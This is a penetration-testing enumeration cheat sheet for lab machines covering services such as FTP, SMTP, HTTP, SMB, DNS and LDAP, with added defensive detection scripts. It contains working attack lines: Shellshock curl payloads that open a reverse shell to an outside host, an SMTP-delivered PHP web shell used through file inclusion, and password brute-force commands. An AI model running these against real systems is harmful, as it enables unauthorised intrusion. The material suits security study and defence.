# Enumeration

## Good Enumeration Guides:

{% embed url="https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/" %}

{% embed url="https://github.com/theonlykernel/enumeration/wiki" %}

{% embed url="https://book.hacktricks.xyz/" %}

## **FTP**

```bash
# FTP NSE scripts (anonymous login, bounce, known backdoors); add your target after -p 21
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <target-ip>
```

### ncFTP

```bash
# apt install ncftp
ncftp 10.10.10.115
```

## **SSH**

**Tutorial from** [**g0tmi1k**](https://blog.g0tmi1k.com/2010/04/pwnos/)

```bash
# Debian OpenSSH weak (predictable) SSH keys, walked through in the pwnOS write-up:
# https://blog.g0tmi1k.com/2010/04/pwnos/
```

## **SMTP**

SMTP is a server-to-server protocol. Users read their mail with IMAP or POP3; outgoing messages are handed to the SMTP server, which relays them to the destination server. The SMTP server keeps a table of the local addresses that can receive or send mail, and we can query that table for valid email addresses. Note that SMTP cannot be used to retrieve mail, only to send it.

```bash
Commands:
HELO - Identifies the client to the server and opens a plain SMTP session.
EHLO - Extended SMTP (ESMTP) greeting; the server replies with the extensions it supports.
STARTTLS - SMTP is sent in cleartext by default. Starting a TLS session encrypts the rest of the connection.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Aborts the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Authenticates the client to the server.
VRFY - Asks the server to verify whether the given user's mailbox exists.
EXPN - Asks the server to expand a mailing list into its member addresses.
```

We can manually try to find out which usernames are in the database. This can be done in the following way.

```bash
nc 192.168.1.103 25                                                                               

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY roooooot
550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table
```

Here we have identified the user root, while roooooot was rejected. VRFY, EXPN and RCPT TO can all be used to identify users. Telnet is sometimes a bit friendlier than nc, so always try that too:

```bash
telnet 10.11.1.229 25
```

Using nmap to automate the enumeration of users.

```bash
nmap --script smtp-commands.nse 192.168.1.101

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
```

```bash
# Using the smtp-user-enum tool.
# -M for mode (VRFY, EXPN or RCPT), -U for userlist, -t for target
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 192.168.1.103
```
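The same 550 "User unknown in local recipient table" reply that tells an attacker a name does not exist also lands in the mail server's own log, which is what a defender should be watching. The script below is an added example (not part of the original notes): it parses a constructed Postfix smtpd log excerpt, pulls out every VRFY/RCPT reject for an unknown recipient, and flags client IPs that probed many distinct names in a short span, which is the signature of the manual and smtp-user-enum runs shown above. The log lines, hostnames and addresses are constructed; the message format follows Postfix's reject logging.

```python
import re
from collections import Counter, defaultdict

# Constructed Postfix smtpd log excerpt (not real traffic). One client sends a
# burst of VRFY probes for non-existent users; a partner MX later gets a single
# legitimate "User unknown" reject for a mistyped address.
SAMPLE_LOG = """\
Mar  3 10:01:02 mail postfix/smtpd[2201]: connect from unknown[192.0.2.10]
Mar  3 10:01:03 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <roooooot>: Recipient address rejected: User unknown in local recipient table; to=<roooooot> proto=SMTP helo=<probe>
Mar  3 10:01:03 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <adm>: Recipient address rejected: User unknown in local recipient table; to=<adm> proto=SMTP helo=<probe>
Mar  3 10:01:04 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <testuser>: Recipient address rejected: User unknown in local recipient table; to=<testuser> proto=SMTP helo=<probe>
Mar  3 10:01:04 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <backup>: Recipient address rejected: User unknown in local recipient table; to=<backup> proto=SMTP helo=<probe>
Mar  3 10:01:05 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <guest>: Recipient address rejected: User unknown in local recipient table; to=<guest> proto=SMTP helo=<probe>
Mar  3 10:01:05 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <oracle>: Recipient address rejected: User unknown in local recipient table; to=<oracle> proto=SMTP helo=<probe>
Mar  3 10:01:06 mail postfix/smtpd[2201]: NOQUEUE: reject: VRFY from unknown[192.0.2.10]: 550 5.1.1 <backup>: Recipient address rejected: User unknown in local recipient table; to=<backup> proto=SMTP helo=<probe>
Mar  3 10:02:11 mail postfix/smtpd[2210]: connect from mx.partner.example[198.51.100.7]
Mar  3 10:02:12 mail postfix/smtpd[2210]: NOQUEUE: reject: RCPT from mx.partner.example[198.51.100.7]: 550 5.1.1 <jsmtih@metasploitable.localdomain>: Recipient address rejected: User unknown in local recipient table; from=<anna@partner.example> to=<jsmtih@metasploitable.localdomain> proto=ESMTP helo=<mx.partner.example>
Mar  3 10:02:13 mail postfix/smtpd[2210]: 7A1B2C3D4E: client=mx.partner.example[198.51.100.7]
"""

# Matches Postfix's reject line for an unknown local recipient, whether the
# probe came in as VRFY or as RCPT TO.
REJECT_RE = re.compile(
    r"reject: (?P<cmd>VRFY|RCPT) from (?P<host>\S+)\[(?P<ip>[0-9a-fA-F.:]+)\]: "
    r"550 5\.1\.1 <(?P<rcpt>[^>]*)>: Recipient address rejected: User unknown"
)


def parse_unknown_user_rejects(lines):
    """Yield (client_ip, command, probed_recipient) for every 'User unknown' reject."""
    for line in lines:
        m = REJECT_RE.search(line)
        if m:
            yield m.group("ip"), m.group("cmd"), m.group("rcpt")


def detect_enumeration(lines, min_distinct=5):
    """Flag client IPs that probed at least `min_distinct` distinct unknown recipients.

    Distinct names (not raw reject count) are used so that one sender retrying a
    single mistyped address is not mistaken for an enumeration sweep.
    """
    probed = defaultdict(set)
    commands = defaultdict(Counter)
    for ip, cmd, rcpt in parse_unknown_user_rejects(lines):
        probed[ip].add(rcpt.lower())
        commands[ip][cmd] += 1
    findings = {}
    for ip, names in probed.items():
        if len(names) >= min_distinct:
            findings[ip] = {
                "distinct_unknown": len(names),
                "commands": dict(commands[ip]),
                "sample_names": sorted(names)[:5],
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['distinct_unknown']} distinct unknown recipients via {info['commands']}")
```

On a real Postfix host the VRFY vector is closed with `disable_vrfy_command = yes` in main.cf; the RCPT TO variant remains, so rate-based detection like this stays useful even after that change.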

SMTP can also be used for log contamination: a payload sent by mail ends up in the user's mail spool, which a vulnerable page later includes. Watch the ippsec video on [Beep](https://youtu.be/XJmBpOd__N8?t=1878).

```bash
telnet 10.10.10.7 25
EHLO ippsec.beep.htb
VRFY asterisk@localhost
# if successful, then:
mail from:pwned@haha.io
rcpt to: asterisk@localhost
data
Subject: You have been pwned
<? echo system($_REQUEST['ipp']); ?>

.
250 2.0.0 Ok: queued as 03655D92F7

# Then include the mail spool through the vulnerable page:
GET /example/page?=../../../../../../../var/mail/asterisk%00&module=Accounts&action?ipp=ls
```

## **HTTP**

Check ippsec video on [Shocker](https://www.youtube.com/watch?v=IBlTdguhgfY\&t=530s)

### Shellshock

```bash
# Shellshock (the NSE script is named http-shellshock)
nmap --script http-shellshock --script-args uri=/cgi-bin -p 80 10.10.10.15

# Testing Shellshock using curl
curl -x 10.10.10.15 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x 10.10.10.15:8080 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status

# Shellshock over SSH
ssh username@10.10.10.15 '() { :;}; /bin/bash'
```
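The curl commands above work because a CGI handler copies request headers into environment variables, and a value beginning with `() {` is parsed by a vulnerable bash as a function definition. From the defensive side the useful thing is to recognise that prefix wherever it arrives in a request. The script below is an added example (not from the original notes or from ippsec's video): it parses raw HTTP/1.1 requests into headers and reports every header carrying the `() {` prefix, including one placed in a header other than User-Agent with extra whitespace, which a rule that only inspects User-Agent would miss. The three sample requests are constructed.

```python
import re

# The Shellshock trigger is a bash function-definition prefix at the start of an
# environment variable's value. We allow optional whitespace between "()" and "{"
# because bash accepts it and detection rules that insist on "() {" are trivially bypassed.
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{")


def parse_request_headers(raw_request):
    """Split a raw HTTP/1.1 request into a {header-name: value} dict.

    Only the header block is read; anything after the blank line (the body) is ignored.
    Header names keep their original spelling so the report is readable.
    """
    head, _, _body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:  # lines[0] is the request line (method, path, version)
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def find_shellshock_headers(headers):
    """Return the names of all headers whose value contains the '() {' prefix."""
    return [name for name, value in headers.items() if SHELLSHOCK_PREFIX.search(value)]


def scan_request(raw_request):
    """Parse one raw request and return the list of flagged header names."""
    return find_shellshock_headers(parse_request_headers(raw_request))


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.15\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
    "\r\n"
)

# The classic carrier: the harmless "echo vulnerable" test string in User-Agent.
PROBE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.15\r\n"
    "User-Agent: () { :;}; echo vulnerable\r\n"
    "Referer: http://10.10.10.15/\r\n"
    "\r\n"
)

# Same prefix in a different header, with extra whitespace before the brace.
EVASIVE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 10.10.10.15\r\n"
    "User-Agent: curl/7.74.0\r\n"
    "Cookie: session=()  { :;}; echo vulnerable\r\n"
    "\r\n"
)


if __name__ == "__main__":
    for label, req in [("benign", BENIGN_REQUEST), ("probe", PROBE_REQUEST), ("evasive", EVASIVE_REQUEST)]:
        print(f"{label}: flagged headers = {scan_request(req)}")
```

Because every request header becomes an `HTTP_*` environment variable for the CGI process, the check has to cover all headers, not just User-Agent; the `EVASIVE_REQUEST` case shows why.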

### Nikto

```bash
# Nikto
nikto -h 10.10.10.10
```

### Gobuster

```bash
# Gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

# Specifying a user agent and the status codes to report
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

# Searching for specific extensions
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
```

### WordPress Scanner

```bash
# WPScan
wpscan -u 10.10.10.10/wp/
```

### WebDAV Scanner

```bash
# Davtest
davtest -url http://10.11.1.15
```

## **HTTPS**

```bash
# Heartbleed status of the different OpenSSL versions:
#   OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
#   OpenSSL 1.0.1g is NOT vulnerable
#   OpenSSL 1.0.0 branch is NOT vulnerable
#   OpenSSL 0.9.8 branch is NOT vulnerable

# Checking if a host is vulnerable to Heartbleed
sslscan 192.168.101.1:443
# or
nmap -sV --script=ssl-heartbleed 192.168.101.8

# You can also exploit the vulnerability using Burp, or Metasploit (in msfconsole):
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run
```
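The version table above is the first filter a defender applies to an inventory of TLS banners before spending time on the active nmap or Metasploit check. The script below is an added example (not from the original notes): it parses the OpenSSL version out of a banner string and applies exactly the rule in the table, with the edge cases that matter (1.0.1 with no letter, 1.0.1g, the 1.0.0 and 0.9.8 branches, `-fips` suffixes, banners with no OpenSSL version at all). The inventory of hosts and banners is constructed.

```python
import re

# Matches "OpenSSL 1.0.1f" and the Apache Server-header form "OpenSSL/1.0.1e".
# The trailing letter group captures the patch letter; suffixes such as "-fips" are ignored.
OPENSSL_RE = re.compile(r"OpenSSL[/\s]+(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_openssl_version(banner):
    """Return (major, minor, patch, letter) from a banner, or None if no OpenSSL version is present."""
    m = OPENSSL_RE.search(banner)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4)


def is_heartbleed_vulnerable(banner):
    """Apply the version table: only 1.0.1 through 1.0.1f are vulnerable.

    Returns True/False for a recognised version and None when the banner carries
    no OpenSSL version, so the caller can route it to an active check instead.
    Assumption: OpenSSL 1.0.1 patch letters are single letters a..u, so a plain
    string comparison against "f" is a correct ordering for this branch.
    """
    v = parse_openssl_version(banner)
    if v is None:
        return None
    major, minor, patch, letter = v
    if (major, minor, patch) != (1, 0, 1):
        return False  # 1.0.0, 0.9.8 and 1.0.2+ are outside the affected range
    return letter <= "f"  # "" (plain 1.0.1) through "f" vulnerable; "g" and later fixed


def classify_inventory(banners):
    """Split a {host: banner} inventory into vulnerable / not_vulnerable / unknown buckets."""
    buckets = {"vulnerable": [], "not_vulnerable": [], "unknown": []}
    for host, banner in banners.items():
        status = is_heartbleed_vulnerable(banner)
        key = "unknown" if status is None else ("vulnerable" if status else "not_vulnerable")
        buckets[key].append(host)
    return buckets


# Constructed inventory (hosts and banners are made up for the example).
SAMPLE_INVENTORY = {
    "web-01": "Apache/2.2.22 (Ubuntu) OpenSSL/1.0.1e",
    "web-02": "OpenSSL 1.0.1g 7 Apr 2014",
    "vpn-01": "OpenSSL 1.0.1 14 Mar 2012",
    "legacy-01": "OpenSSL 0.9.8zh 3 Dec 2015",
    "api-01": "OpenSSL 1.0.2k-fips 26 Jan 2017",
    "lb-01": "nginx/1.18.0",
}


if __name__ == "__main__":
    for bucket, hosts in classify_inventory(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

A banner match is a triage result, not a verdict: distributions backport the Heartbleed fix without bumping the upstream version string, so a host reported as vulnerable here still needs the `ssl-heartbleed` script or the Metasploit scanner above to confirm, and a host with no version in its banner goes straight to that active check.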

## **POP3**

```bash
# To login:
telnet 10.11.1.13 110
USER adam
PASS adam123

# To list messages:
LIST

# To retrieve a message (give its number from LIST):
RETR

# To exit:
QUIT
```

## **RPC**

```bash
nmap -p 111 --script=rpcinfo 10.11.1.13

rpcclient -U "" -N 10.10.10.8

rpcinfo -p 10.11.1.13

rpcclient -U username 10.11.1.13

# rpcclient commands:
srvinfo
enum
enumalsgroups
enumdomains
enumdrivers
enumkey
enumprivs
enumdata
enumdomgroups
enumforms
enumports
enumtrust
enumdataex
enumdomusers
enumjobs
enumprinter
lookupnames administrator
queryuser 500
```

## **SMB**

Enumeration and vulnerability scanning with nmap. Add your target IP address after pasting the command in your terminal.

```bash
nmap -p 139,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse <target-ip>

nmap -p 139,445 -vv --script vuln <target-ip>

nmap -p 139,445 -vv --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse <target-ip>

nmap -p 139,445 -vv --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery <target-ip>
```

### Using smbmap

```bash
smbmap -H 10.11.1.128 -u Admin -p "Password"
smbmap -H 10.11.1.13
smbmap -H 10.11.1.13 -u Doesnexist
```

### Using smbclient

```bash
smbclient -L //10.11.1.13
smbclient -L //10.11.1.13/ipc$ -U John
# Use forward slashes (or quote the backslashes) so the shell does not eat them
smbclient //10.11.1.13/Admin$ -U john
```

### Mount the smb share

```bash
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/sharename /mnt/cifs
mount -t cifs -o user=admin -o vers=1.0 //10.11.1.128/share smb
```

### Check smb file sharing

```bash
# showmount queries the NFS mountd service (see the NFS section), not SMB itself
showmount -e 10.11.1.128
```

### crackmapexec

```bash
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
```

## **NFS**

```bash
# Enumerate exports
showmount -e 10.10.11.12

# Mounting the share
mount -t nfs 192.168.100.25:/home /tmp/infosec

# References:
# https://resources.infosecinstitute.com/exploiting-nfs-share/
# https://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
```

## **SNMP**

```bash
snmpwalk -c public -v1 10.0.0.0

snmpcheck -t 192.168.1.X -c public

onesixtyone -c names -i hosts

nmap -sT -p 161 192.168.X.X -oG snmp_results.txt

snmpenum -t 192.168.1.X
```

## **MySQL**

```bash
nmap -sV -Pn -vv -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1
```

### **SQL Server**

Reference: <https://pentestlab.blog/category/exploitation-techniques/>

```bash
nmap -p1433 10.10.10.16 --script ms-sql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt
```

## **DNS**

**Important DNS records:**

```
A (address) records:  contain the IP address of the domain.
MX records:  stands for Mail Exchange; contain the mail exchange servers for the domain.
CNAME records:  used for aliasing domains. CNAME stands for Canonical Name and links a sub-domain to an existing domain DNS record.
NS records:  stands for Name Server; indicate the authoritative (or main) name servers for the domain.
SOA records:  stands for Start of Authority; contain important information about the domain such as the primary name server, a serial number showing when the zone was last updated, and the party responsible for the domain.
PTR or Pointer records:  map an IP address back to a hostname. This record is also called a 'reverse record' because it connects an IP address to a hostname instead of the other way around.
TXT records:  contain text inserted by the administrator (such as notes about the way the network has been configured).
```

```bash
# Zone Transfer
dig axfr megacorp.local @10.10.10.179

# Windows:
nslookup
set type=any
ls -d blah.com

# DNS IP Lookup
dig a <domain-name-here.com> @<dns-server-here>

# MX Record Lookup
dig mx <domain-name-here.com> @<dns-server-here>

# Whois Enumeration
whois <domain-name-here>

# DNSRecon Tool
dnsrecon -d 10.11.1.13 -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
# Zone Transfer
dnsrecon -d example.com -t axfr

# Find Active Directory using DNS
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='labs.test.com'"
```

## **Telnet**

```bash
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet  
```

## **RDP**

```bash
ncrack -vv --user administrator -P passwords.txt rdp://192.168.1.10,CL=1 

# Then use rdesktop to login
rdesktop 192.168.1.10  
```

## **LDAP**

```bash
# You will get whatever object is at the base of the directory:
ldapsearch -LLL -x -h ldap.example.com -p 3389 -s base '(objectclass=*)'

# ippsec - Lightweight: first read the naming contexts from the root DSE
ldapsearch -x -h 10.10.10.107 -s base namingcontexts
# Then, using the base DN from that output:
ldapsearch -x -h 10.10.10.107 -b "dc=hackthebox,dc=htb"

# From Impacket
GetADUsers.py -all -dc-ip {ip} {domain/username}

# Nmap using the LDAP script
nmap -p 389 --script ldap-search ypuffy.htb
```

## **Kerberos**

```bash
# AS-REP roasting (accounts without Kerberos pre-authentication) -> GetNPUsers.py
# Kerberoasting (service tickets for accounts with an SPN)      -> GetUserSPNs.py
```

Good references on kerberos exploitation:

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>

<https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
